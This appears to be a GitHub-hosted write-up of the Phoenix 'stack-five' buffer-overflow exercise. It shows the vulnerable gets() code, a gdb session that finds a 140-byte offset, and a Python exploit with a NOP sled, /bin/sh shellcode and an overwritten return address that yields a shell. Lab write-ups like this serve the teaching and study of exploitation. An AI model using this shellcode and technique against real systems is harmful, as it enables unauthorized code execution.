-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathstack-five
More file actions
97 lines (73 loc) · 3.52 KB
/
stack-five
File metadata and controls
97 lines (73 loc) · 3.52 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
### Stack Five (x86) ###
void start_level() {
char buffer[128];
gets(buffer);
}
int main(int argc, char **argv) {
printf("%s\n", BANNER);
start_level();
}
-> From the question code above we can see that we can overflow buffer as there is not size checking before gets()
-> is called on it.
-> By overwriting the return value and jumping to shellcode is possible to get arbitrary code execution.
-> We will need the offset in bytes from the begining of buffer to the return address.
(gdb) disass start_level
Dump of assembler code for function start_level:
0x08048485 <+0>: push ebp
0x08048486 <+1>: mov ebp,esp
0x08048488 <+3>: sub esp,0x88
0x0804848e <+9>: sub esp,0xc
0x08048491 <+12>: lea eax,[ebp-0x88]
0x08048497 <+18>: push eax
0x08048498 <+19>: call 0x80482c0 <gets@plt>
0x0804849d <+24>: add esp,0x10
0x080484a0 <+27>: nop
0x080484a1 <+28>: leave
0x080484a2 <+29>: ret
End of assembler dump.
(gdb) b *0x08048498
Breakpoint 1 at 0x8048498
(gdb) run <<< $(python -c "print 'A'*128")
-> We can use gdb's nexti command to execute the next line of code
(gdb) nexti
(gdb) x/16x $sp
0xffffd650: 0xffffd660 0xffffd678 0xffffd6f8 0xf7fb5da9
0xffffd660: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd670: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd680: 0x41414141 0x41414141 0x41414141 0x41414141
-> We can see that buffer starts a writing from memory address 0xffffd660
-> Repeating nexti until we reach but do not execute ret
0x8048499 <start_level+20> and edi, esi
0x804849b <start_level+22> (bad)
0x804849c <start_level+23> inc DWORD PTR [ebx-0x366fef3c]
→ 0x80484a2 <start_level+29> ret
↳ 0x80484c9 <main+38> mov eax, 0x0
0x80484ce <main+43> mov ecx, DWORD PTR [ebp-0x4]
0x80484d1 <main+46> leave
0x80484d2 <main+47> lea esp, [ecx-0x4]
0x80484d5 <main+50> ret
0x80484d6 xchg ax, ax
-> The next instruction is now ret. The return address will now be on the top of the stack
(gdb) print/x $sp
$1 = 0xffffd6ec
(gdb) print/d 0xffffd6ec - 0xffffd660
$3 = 140
-> The offset is 140 bytes. Knowing this we can now create our exploit. I will do in the form of a python script
user@phoenix-amd64:/opt/phoenix/i486$ sudo nano stack-five-exploit.py
import sys
offset = 140
payload = "\x90"*50 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
payload += "A" * (offset-len(payload))
#payload += '\x80\xd6\xff\xff' # 0xffffd680 works in gdb
payload += '\xb2\xd6\xff\xff' # +50 addr spaceses
sys.stdout.write(payload)
-> Do note that running an binary in gdb pushes it further up the stack. Thats why I had to add shift my return address 50
-> addresses lower on the stack to hit the nop sled. This might take some trial and error.
-> Just remember to move your jump to address lower on the stack (higher addresses) not higher and move the return
-> addresses the length of the nop sled to cover the max distance. My nop sled is 50 bytes in lengh so I just add 50 to my
-> first address.
-> I also prefer to use sys.stdout.write() opposed to print becuase print can cause problems as there can be extra characters besides your shellcode
user@phoenix-amd64:/opt/phoenix/i486$ python stack-five-exploit.py | ./stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
$ whoami
phoenix-i386-stack-five